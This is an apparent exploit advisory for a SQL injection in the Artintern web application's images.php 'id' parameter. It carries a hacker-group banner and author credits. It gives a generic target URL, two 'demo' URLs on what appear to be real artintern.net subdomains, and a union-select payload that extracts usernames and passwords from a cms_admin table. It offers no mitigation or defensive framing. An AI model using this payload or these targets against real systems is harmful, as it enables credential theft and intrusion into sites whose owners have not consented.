Artintern suffers from a remote SQL injection vulnerability.
2a4007b635c808de66afaf5b4beea0f2cd1991325cec4ca7a10f7929220e5c69
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
|* ______ ____ __ __ |
|* /\__ _\/\ _`\ /\ \/\ \ |
|* \/_/\ \/\ \ \L\ \\ \ \_\ \ { Turki$ hackers } |
|* \ \ \ \ \ _ <'\ \ _ \ |
|* \ \ \ \ \ \L\ \\ \ \ \ \ |
|* \ \_\ \ \____/ \ \_\ \_\ |
|* \/_/ \/___/ \/_/\/_/ |
|* |
|* |
|=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*=*-*-*-*-*-*-*-*-*=|
=======================================================================
\* [Title] :[ artintern sql injection vulnerability] /*
\* [Author] :[skote_vahshat] /*
\* [Home] :[Http://Skote-Vahshat.com] /*
\* [Archive] :[Http://xpl.skote-vahshat.com] /*
\* [Email] :[skote.vahshat@Gmail.Com] /*
=======================================================================
/* Web Server: Apache/2.2.3 (Red Hat)
/* Powered-by: PHP/5.1.6
/* [+]Exploit :
/* http://www.target.com/images.php?id=[SQLi]
/* [+]Demo:
/* http://show.artintern.net/images.php?id=1762[SQLi]
/* http://news.artintern.net/images.php?id=528[SQLi]
/* [+]injection
/* union+select+1,2,user,4,password,6+from+cms_admin
/*
=======================================================================
|_***_| spical thanks : bl4ck.viper all turkiS hackers|
=======================================================================